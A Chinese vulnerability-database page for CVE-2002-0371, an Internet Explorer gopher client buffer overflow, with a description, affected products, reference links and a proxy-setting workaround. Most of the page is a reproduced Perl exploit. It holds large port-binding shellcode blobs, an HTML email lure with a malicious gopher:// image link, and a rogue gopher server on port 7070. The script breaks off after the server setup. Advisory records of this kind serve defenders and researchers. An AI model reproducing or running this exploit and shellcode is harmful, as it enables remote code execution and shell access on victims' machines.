CVE-2002-0371
CVSS7.5
发布时间 :2002-07-03 00:00:00
修订时间 :2016-10-17 22:19:52
NMCOES    

[原文]Buffer overflow in gopher client for Microsoft Internet Explorer 5.1 through 6.0, Proxy Server 2.0, or ISA Server 2000 allows remote attackers to execute arbitrary code via a gopher:// URL that redirects the user to a real or simulated gopher server that sends a long response.


[CNNVD]MS IE处理gopher协议远程缓冲区溢出漏洞(CNNVD-200207-024)

        
        MS IE是一款Microsoft公司分发的WEB浏览器,Gopher是一款由University of Minnesota开发的文件目录查看协议。
        MSIE在处理Gopher协议时存在缓冲区溢出,可导致远程攻击者利用此漏洞以IE用户进程权限在客户端系统上执行任意指令。
        MSIE内置Gopher客户端,Gopher页可以通过在URL中以"gopher://"为开头的方法进行访问,不过MS IE中的部分处理Gopher应答的数据存在漏洞,可导致客户端IE产生缓冲区溢出,溢出发生时,堆栈中的某一个固定缓冲区被来自Gopher服务器的数据覆盖,此数据可以包含0到255的字符,使得利用此漏洞更加容易。
        攻击者可以通过构建恶意WEB页面或者使用重定向恶意Gopher服务器的HTML邮件,当用户查看这些恶意链接时导致产生缓冲区溢出;服务器端可以简单的使用一程序监听TCP端口并对客户端写一块数据,不需要构建全部的Gopher功能。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:proxy_server:2.0:sp1
cpe:/a:microsoft:ie:6.0Microsoft Internet Explorer 6.0
cpe:/a:microsoft:ie:5.0.1:sp2Microsoft Internet Explorer 5.0.1 SP2
cpe:/a:microsoft:ie:5.0.1:sp1Microsoft Internet Explorer 5.0.1 SP1
cpe:/a:microsoft:ie:5.5Microsoft ie 5.5
cpe:/a:microsoft:isa_server:2000:sp1Microsoft isa_server 2000 sp1
cpe:/a:microsoft:proxy_server:2.0Microsoft proxy_server 2.0
cpe:/a:microsoft:ie:5.5:sp2Microsoft Internet Explorer 5.5 SP2
cpe:/a:microsoft:ie:5.0.1Microsoft Internet Explorer 5.0.1
cpe:/a:microsoft:ie:5.5:sp1Microsoft Internet Explorer 5.5 SP1
cpe:/a:university_of_minnesota:gopher
cpe:/a:microsoft:isa_server:2000Microsoft isa server 2000

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:98Gopher Client Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0371
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0371
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200207-024
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=102320516707940&w=2
(UNKNOWN)  BUGTRAQ  20020604 Buffer overflow in MSIE gopher code
http://marc.info/?l=bugtraq&m=102397955217618&w=2
(UNKNOWN)  BUGTRAQ  20020613 Microsoft releases critical fix that breaks their own software!
http://online.securityfocus.com/archive/1/276848
(UNKNOWN)  BUGTRAQ  20020613 Flawed workaround in MS02-027 -- gopher can run on _any_ port, not just 70
http://www.iss.net/security_center/static/9247.php
(UNKNOWN)  XF  ie-gopher-bo(9247)
http://www.kb.cert.org/vuls/id/440275
(UNKNOWN)  CERT-VN  VU#440275
http://www.microsoft.com/technet/security/bulletin/ms02-027.asp
(VENDOR_ADVISORY)  MS  MS02-027
http://www.pivx.com/workaround_fail.html
(UNKNOWN)  MISC  http://www.pivx.com/workaround_fail.html
http://www.securityfocus.com/bid/4930
(UNKNOWN)  BID  4930

- 漏洞信息

MS IE处理gopher协议远程缓冲区溢出漏洞
高危 边界条件错误
2002-07-03 00:00:00 2006-09-25 00:00:00
远程  
        
        MS IE是一款Microsoft公司分发的WEB浏览器,Gopher是一款由University of Minnesota开发的文件目录查看协议。
        MSIE在处理Gopher协议时存在缓冲区溢出,可导致远程攻击者利用此漏洞以IE用户进程权限在客户端系统上执行任意指令。
        MSIE内置Gopher客户端,Gopher页可以通过在URL中以"gopher://"为开头的方法进行访问,不过MS IE中的部分处理Gopher应答的数据存在漏洞,可导致客户端IE产生缓冲区溢出,溢出发生时,堆栈中的某一个固定缓冲区被来自Gopher服务器的数据覆盖,此数据可以包含0到255的字符,使得利用此漏洞更加容易。
        攻击者可以通过构建恶意WEB页面或者使用重定向恶意Gopher服务器的HTML邮件,当用户查看这些恶意链接时导致产生缓冲区溢出;服务器端可以简单的使用一程序监听TCP端口并对客户端写一块数据,不需要构建全部的Gopher功能。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 建议不使用Gopher协议:
        在Internet选项中设置Gopher功能的代理,选择工具-->Internet选项-->连接,单击"局域网LAN设置",勾取"使用代理服务器",选择"高级",在Gopher段处输入"localhost"及端口处输入"1"。
        这将阻止IE直接接收、解释gopher信息。
        厂商补丁:
        Microsoft
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.microsoft.com/windows/ie/default.asp

- 漏洞信息 (21510)

MS IE 5/6,MS ISA Server 2000,MS Proxy Server 2.0 Gopher Client Buffer Overflow (EDBID:21510)
windows remote
2002-07-27 Verified
0 mat@monkey.org
N/A [点击下载]
source: http://www.securityfocus.com/bid/4930/info

Microsoft Internet Explorer, Proxy Server and ISA Server includes a gopher client. Reportedly, these clients are vulnerable to a buffer overflow condition.

The vulnerability exists in the component that parses gopher replies. A malicious server is able to send a reply that will overflow the buffer and run arbitrary code on a user's system. 

#!/usr/bin/perl
#
# mat@monkey.org
# 2002.7.27
# IE gopher buffer overflow exploit
# only tested with my W2k Korean and Wme Korean windows OS...
# you maybe have to change some addresses with your installations...
#
my $w2k_sp2_kor="w2k_sp2_kor";
my $w2k_kor="w2k_kor";
my $wme_kor="wme_kor";

#choose which OS this script will support(?)
my $os_str=$wme_kor;
$os_str=$w2k_sp2_kor;
$os_str=$w2k_kor;

#for w2k_sp2_kor
#shellcode from Deepzone.com
# portshell on 8008
# (LoadLibrary: 40100c GetProcAddress: 401000)
my
$DeepZone_w32ShellCode_for_w2k_kor="\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33
\xc9\xb1\x1c\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04\x90\x90\x90
\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c
\x6b\xbd\xd9\x99\x14\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b\x9b
\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9\x99\xf3\x93\x09\x09\x09\x09
\xc0\x71\x23\x9b\x99\x99\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9
\x99\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99\xf3\x99\x14\x2c\x40
\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c
\xaa\xbc\xd9\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c\xbc\xd9\x99
\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9
\x99\x14\x2c\xa8\xbf\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc\xd9
\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9\x99\x34\x14\x24\xa8\xbf\xd9
\x99\x32\x14\x24\xac\xbf\xd9\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x5e
\x1c\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99\xcf\x14\x2c\x6c\xbc
\xd9\x99\xcf\xf3\x99\xf3\x99\xf3\x89\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9
\x99\xcf\xf3\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x09\xf1\x99\x9b\x99
\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9
\x66\x0c\x63\xbd\xd9\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66\x0c
\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99\x14\x2c\xcc\xbf\xd9\x99\xcf
\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99
\x32\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70\xbc\xd9\x99
\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09
\x09\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70\xbc\xd9\x99
\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf
\xd9\x99\x9b\x96\x1b\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99\xeb
\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x99\xb9\x99\x99\xf3\x99\x12\x1c\xfc
\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c
\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99
\x12\x1c\xfc\xbf\xd9\x99\xf3\x99\xc9\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0
\xbf\xd9\x99\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\xfc\xbf\xd9\x99\xce
\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99
\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x1e\xfe\x66
\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c
\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x99
\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\x74\xbc
\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99
\x12\x1c\xf8\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99
\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6
\xbc\xd9\x99\x70\x20\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x8b\xbc
\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b\xbc\xd9\x99\xf3\x99\x66\x0c
\xce\xbc\xd9\x99\xc8\xcf\xf1\x95\x89\xd9\x99\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7
\xc8\xcf\xca\xf1\x99\x89\xd9\x99\x09\xc3\x66\x8b\xc9\x35\x1d\x59\xec\x62\xc1\x32
\xc0\x7b\x70\x5a\xce\xca\xd6\xda\xd2\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb
\xf0\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed\x99\xea\xfc
\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99
\xd2\xdc\xcb\xd7\xdc\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc\x99
\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff\xf6\xd8\x99\xda\xeb\xfc\xf8
\xed\xfc\xc9\xeb\xf6\xfa\xfc\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd
\xc9\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6\xfa\x99\xcb\xfc\xf8
\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc
\xe9\x99\xda\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\xe1\xf0\xed\xc9\xeb
\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\xfc\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9
\xa5\xf0\xe3\xf8\xf7\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xa7\x9b
\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x95\x99\x99\x99\x99
\x99\x99\x99\x98\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99\x89
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x90
\x90\x90\x90\x90\x90";

#for w2k_me
#shellcode from Deepzone.com
# portshell on 8008
# (LoadLibrary: 4011F4 GetProcAddress: 401204)
my
$DeepZone_w32ShellCode_for_wme_kor="\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33
\xc9\xb1\x1c\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04\x90\x90\x90
\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c
\x6b\xbd\xd9\x99\x14\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b\x9b
\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9\x99\xf3\x93\x09\x09\x09\x09
\xc0\x71\x23\x9b\x99\x99\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9
\x99\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99\xf3\x99\x14\x2c\x40
\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c
\xaa\xbc\xd9\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c\xbc\xd9\x99
\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9
\x99\x14\x2c\xa8\xbf\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc\xd9
\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9\x99\x34\x14\x24\xa8\xbf\xd9
\x99\x32\x14\x24\xac\xbf\xd9\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x5e
\x1c\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99\xcf\x14\x2c\x6c\xbc
\xd9\x99\xcf\xf3\x99\xf3\x99\xf3\x89\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9
\x99\xcf\xf3\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x09\xf1\x99\x9b\x99
\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9
\x66\x0c\x63\xbd\xd9\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66\x0c
\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99\x14\x2c\xcc\xbf\xd9\x99\xcf
\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99
\x32\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70\xbc\xd9\x99
\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09
\x09\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70\xbc\xd9\x99
\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf
\xd9\x99\x9b\x96\x1b\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99\xeb
\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x99\xb9\x99\x99\xf3\x99\x12\x1c\xfc
\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c
\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99
\x12\x1c\xfc\xbf\xd9\x99\xf3\x99\xc9\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0
\xbf\xd9\x99\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\xfc\xbf\xd9\x99\xce
\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99
\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x1e\xfe\x66
\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c
\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x99
\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\x74\xbc
\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99
\x12\x1c\xf8\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99
\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6
\xbc\xd9\x99\x70\x20\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x8b\xbc
\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b\xbc\xd9\x99\xf3\x99\x66\x0c
\xce\xbc\xd9\x99\xc8\xcf\xf1\x6d\x88\xd9\x99\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7
\xc8\xcf\xca\xf1\x9d\x8b\xd9\x99\x09\xc3\x66\x8b\xc9\x35\x1d\x59\xec\x62\xc1\x32
\xc0\x7b\x70\x5a\xce\xca\xd6\xda\xd2\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb
\xf0\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed\x99\xea\xfc
\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99
\xd2\xdc\xcb\xd7\xdc\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc\x99
\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff\xf6\xd8\x99\xda\xeb\xfc\xf8
\xed\xfc\xc9\xeb\xf6\xfa\xfc\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd
\xc9\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6\xfa\x99\xcb\xfc\xf8
\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc
\xe9\x99\xda\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\xe1\xf0\xed\xc9\xeb
\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\xfc\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9
\xa5\xf0\xe3\xf8\xf7\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xa7\x9b
\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x95\x99\x99\x99\x99
\x99\x99\x99\x98\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99\x89
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x90
\x90\x90\x90\x90\x90";

#shellcode below is not so portable
#hard coded LoadLibrary and GetProcAddress Address...
#for w2k
my
$portbind_1367_shellcode_for_w2k_kor="\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\x
e0\x8b\xfc\x33\xc9\x89\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x
33\x32\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab\x4f\x32\x
c0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f\xaa\xb8\x54\xa2\xe5\x77\x
8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89\x45\xfc\xb8\x54\xa2\xe5\x77\x8d\x9d\x19\x
ff\xff\xff\x53\xff\xd0\x89\x45\xf8\xbb\xc1\x9a\xe5\x77\x6a\x47\xff\x75\xfc\xff\x
d3\x89\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe\x1d\x02\x
56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56\xff\x75\xfc\xff\xd3\x89\x
45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\x
ff\x75\xfc\xff\xd3\x89\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\x
d3\x89\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89\x85\x18\x
ff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a\x17\xff\x75\xf8\xff\xd3\x
89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x
75\xf8\xff\xd3\x89\x45\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x
75\xf8\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a\x03\xff\x
75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32\xe4\xb0\x02\x66\xab\x66\x
b8\x05\x57\x66\xab\x33\xc0\xab\xf7\xd0\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\x
c8\xfe\xc8\xab\x33\xc0\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\x
ff\x55\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10\x8d\x45\x
a0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff\x55\xd4\x33\xc0\x50\x50\x
ff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x
8d\x45\x9c\x50\xff\x55\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x
94\x50\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0\xf3\xaa\x
8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47\x2c\x8b\x45\x94\x89\x47\x
38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\x
c4\x50\x8d\x85\x38\xff\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x
53\xff\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89\x85\x30\x
ff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50\x53\x53\x53\xff\x75\x9c\x
ff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x
2c\xff\xff\xff\x50\x53\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x
74\x6d\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\x
ff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90\x90\x90\x6a\x32\xff\x95\x
28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\x
ff\x75\xc0\xff\x55\xc8\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x
8d\x85\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff\x
75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4\xff\x95\x1c\xff\xff\xff\x
ff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a\xff\xff\x95\x18\xff\xff\xff";

printf "Starting eat_gopher[IE gopher BOF exploit]...\r\n";
printf " <mat\@monkey.org>\r\n";
printf " Send target mail with html like this:
------------------------------------------------------------------
<html>
<body>
<img src=gopher://<ipaddress>:7070/11/%09%09%2b>
Are you gopher?
I am eat_gopher!
</body>
</html>
------------------------------------------------------------------
";

require 5.002;
use strict;
use Socket;
use Carp;

sub spawn;
sub send_gopher_plus_exploit_reply;

my $port=7070;
my $proto=getprotobyname('tcp');
socket(Server,PF_INET,SOCK_STREAM,$proto) || die "socket: $!";
setsockopt(Server,SOL_SOCKET,SO_REUSEADDR,pack("l",1)) || die "setsockopt: $!";
bind(Server,sockaddr_in($port,INADDR_ANY)) || die "bind: $!";
listen(Server,SOMAXCONN) || die "listen: $!";

printf "Listening on $port...\n";

my $waitedpid=0;
my $paddr;

sub REAPER {
	$waitedpid=wait;
	$SIG{CHLD}=\&REAPER;
}
$SIG{CHLD}=\&REAPER;

